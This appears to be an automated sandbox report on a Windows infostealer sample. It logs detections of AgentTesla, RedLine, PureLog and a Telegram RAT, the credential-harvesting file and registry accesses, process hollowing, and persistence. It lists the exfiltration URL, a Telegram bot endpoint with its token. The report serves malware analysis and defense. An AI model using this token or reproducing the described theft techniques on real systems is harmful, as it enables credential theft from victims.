Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BE50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00BE50D7
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BF2230 GetUserNameW, 0_2_00BF2230
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BE418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_00BE418A
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00BB4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00BB4AFE
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected AgentTesla
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 11.2.RegSvcs.exe.51d0ee8.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.29f1046.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.51d0ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.51d0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.29f1046.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.5490000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.29f015e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.51d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.3d05d90.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.29f015e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.3d05d90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.3842075995.00000000032B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3451674428.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3477412077.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3452111397.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3452111397.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.3842075995.00000000032E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.3842075995.00000000032CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3452111397.0000000002CFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3478826370.0000000005490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 1440, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 4864, type: MEMORYSTR
Yara detected PureLog Stealer
Source: Yara match File source: 11.2.RegSvcs.exe.51d0ee8.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.29f1046.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.51d0ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.51d0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.29f1046.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.5490000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.29f015e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.51d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.3d05d90.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.29f015e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.3d05d90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3451674428.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3477412077.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3478826370.0000000005490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Yara detected RedLine Stealer
Source: Yara match File source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.name.exe.3c50000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.name.exe.33a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.name.exe.3710000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.3336864673.0000000003710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3304083272.00000000033A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3449507339.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3449893133.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 11.2.RegSvcs.exe.51d0ee8.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.29f1046.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.51d0ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.51d0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.29f1046.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.5490000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.29f015e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.51d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.3d05d90.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.29f015e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.3d05d90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.3842075995.000000000330C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3451674428.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3477412077.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3452111397.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3452111397.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.3842075995.000000000328E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3478826370.0000000005490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 1440, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 4864, type: MEMORYSTR
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\FTP Navigator\Ftplist.txt Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
OS version to string mapping found (often used in BOTs)
Source: name.exe Binary or memory string: WIN_81
Source: name.exe Binary or memory string: WIN_XP
Source: name.exe Binary or memory string: WIN_XPe
Source: name.exe Binary or memory string: WIN_VISTA
Source: name.exe Binary or memory string: WIN_7
Source: name.exe Binary or memory string: WIN_8
Source: name.exe.0.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Yara detected Credential Stealer
Source: Yara match File source: 11.2.RegSvcs.exe.51d0ee8.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.29f1046.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.51d0ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.51d0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.29f1046.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.5490000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.29f015e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.51d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.3d05d90.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.29f015e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.3d05d90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3451674428.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3477412077.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3452111397.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3478826370.0000000005490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 1440, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 4864, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected AgentTesla
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 11.2.RegSvcs.exe.51d0ee8.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.29f1046.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.51d0ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.51d0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.29f1046.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.5490000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.29f015e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.51d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.3d05d90.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.29f015e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.3d05d90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.3842075995.00000000032B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3451674428.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3477412077.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3452111397.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3452111397.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.3842075995.00000000032E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.3842075995.00000000032CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3452111397.0000000002CFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3478826370.0000000005490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 1440, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 4864, type: MEMORYSTR
Yara detected PureLog Stealer
Source: Yara match File source: 11.2.RegSvcs.exe.51d0ee8.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.29f1046.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.51d0ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.51d0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.29f1046.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.5490000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.29f015e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.51d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.3d05d90.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.29f015e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.3d05d90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3451674428.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3477412077.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3478826370.0000000005490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Yara detected RedLine Stealer
Source: Yara match File source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.name.exe.3c50000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.name.exe.33a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.name.exe.3710000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.3336864673.0000000003710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3304083272.00000000033A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3449507339.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3449893133.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 11.2.RegSvcs.exe.51d0ee8.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.29f1046.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.51d0ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.51d0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.29f1046.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.5490000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.29f015e.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.51d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.3d05d90.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.29f015e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegSvcs.exe.3d05d90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.3842075995.000000000330C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3451674428.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3477412077.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3452111397.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3452111397.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.3842075995.000000000328E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3478826370.0000000005490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 1440, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 4864, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C26596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 0_2_00C26596
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe Code function: 0_2_00C26A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00C26A5A
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00A36596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 8_2_00A36596
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_00A36A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 8_2_00A36A5A
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1436302 Sample: Case_Your company bad drive... Startdate: 04/05/2024 Architecture: WINDOWS Score: 100 36 api.telegram.org 2->36 50 Snort IDS alert for network traffic 2->50 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 58 12 other signatures 2->58 9 Case_Your company bad driver Vehicle No.exe 6 2->9         started        13 wscript.exe 1 2->13         started        signatures3 56 Uses the Telegram API (likely for C&C communication) 36->56 process4 file5 32 C:\Users\user\AppData\Local\...\name.exe, PE32 9->32 dropped 76 Binary is likely a compiled AutoIt script file 9->76 15 name.exe 3 9->15         started        78 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->78 19 name.exe 2 13->19         started        signatures6 process7 file8 34 C:\Users\user\AppData\Roaming\...\name.vbs, data 15->34 dropped 40 Binary is likely a compiled AutoIt script file 15->40 42 Machine Learning detection for dropped file 15->42 44 Drops VBS files to the startup folder 15->44 46 Sample uses process hollowing technique 15->46 21 name.exe 2 15->21         started        24 RegSvcs.exe 15->24         started        48 Maps a DLL or memory area into another process 19->48 26 RegSvcs.exe 2 19->26         started        signatures9 process10 signatures11 60 Binary is likely a compiled AutoIt script file 21->60 62 Writes to foreign memory regions 21->62 64 Maps a DLL or memory area into another process 21->64 28 RegSvcs.exe 15 2 21->28         started        66 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 24->66 68 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 26->68 70 Tries to steal Mail credentials (via file / registry access) 26->70 72 Tries to harvest and steal ftp login credentials 26->72 74 2 other signatures 26->74 process12 dnsIp13 38 api.telegram.org 149.154.167.220, 443, 49708, 49709 TELEGRAMRU United Kingdom 28->38 80 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 28->80 82 Tries to steal Mail credentials (via file / registry access) 28->82 84 Installs a global keyboard hook 28->84 signatures14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false

Contacted Domains

Name IP Active
api.telegram.org 149.154.167.220 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot7166327996:AAGPihVNd1ShcG_CmE24Dqt8T2_CJLtBA7k/sendDocument false
    		high